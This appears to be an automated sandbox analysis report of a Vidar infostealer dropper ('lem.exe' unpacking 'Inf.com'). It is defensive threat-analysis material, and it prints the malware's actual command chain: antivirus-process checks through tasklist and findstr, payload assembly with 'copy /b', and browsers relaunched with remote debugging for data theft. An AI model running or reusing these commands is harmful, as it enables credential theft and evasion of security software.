                Source: chrome.exe, 00000011.00000002.2702850314.000051D802AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2654763634.000051D802B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655078399.000051D802A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655120352.000051D802A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654502382.000051D802A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654990783.000051D802AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2702850314.000051D802AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcap
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlault
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: C:\Users\user\Desktop\lem.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 13_2_00A8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00A8F7C7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 13_2_00A8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00A8F55C
                Source: C:\Users\user\Desktop\lem.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 13_2_00AA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00AA9FD2

                System Summary

                Source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2FFE0 CloseHandle,NtProtectVirtualMemory,13_2_00A2FFE0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,13_2_00A84763
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00A71B4D
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00A7F20D
                Source: C:\Users\user\Desktop\lem.exe File created: C:\Windows\NortheastPresence
                Source: C:\Users\user\Desktop\lem.exe File created: C:\Windows\FascinatingFee
                Source: C:\Users\user\Desktop\lem.exe File created: C:\Windows\FinishedMistress
                Source: C:\Users\user\Desktop\lem.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 00A30DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 00A2FD52 appears 40 times
                Source: lem.exe Static PE information: invalid certificate
                Source: lem.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 68QI5X.13.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@97/306@31/16
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A841FA GetLastError,FormatMessageW,13_2_00A841FA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00A72010
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71A0B AdjustTokenPrivileges,CloseHandle,13_2_00A71A0B
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00A7DD87
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,13_2_00A83A0E
                Source: C:\Users\user\Desktop\lem.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Authorization
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
                Source: C:\Users\user\Desktop\lem.exe File created: C:\Users\user\AppData\Local\Temp\nst7743.tmp
                Source: lem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\lem.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\lem.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000011.00000002.2695591525.000051D800798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: AAS00R1VA.13.dr, L68GDJMO8.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: lem.exe Virustotal: Detection: 11%
                Source: C:\Users\user\Desktop\lem.exe File read: C:\Users\user\Desktop\lem.exe
                Source: unknown Process created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
                Source: C:\Users\user\Desktop\lem.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                Source: C:\Users\user\Desktop\lem.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ondemandconnroutehelper.dllJump to behavior
